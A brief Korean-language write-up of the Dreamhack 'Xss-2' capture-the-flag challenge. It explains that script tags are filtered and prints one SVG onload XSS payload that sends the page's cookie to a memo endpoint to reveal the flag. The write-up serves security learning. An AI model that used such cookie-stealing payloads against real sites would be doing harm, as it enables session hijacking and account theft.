Dreamhack level1 Xss-2 문제 해결

- 2023.03.30

---

Dreamhack level1 Xss-2

1. 문제 확인

 

• Xss 방화벽이 걸려있는 상태
• Xss 취약점을 이용

 

 

2. 소스 코드 확인

 

• 스크립트 실행 코드가 존재X
• 다른 메소드/태그를 사용해 스크립트를 실행시켜 주어야 함

 

3. 문제 해결

 

• xss 취약점 이용해 스크립트 실행 시킴
• <svg/onload=location["href"]="http://127.0.0.1:8000/memo?memo="+document["cookie"]>

 

 

• 메모 페이지에 들어가면 스크립트가 실행되어 flag가 출력되어있는 것을 확인 가능

 

 

• 문제 해결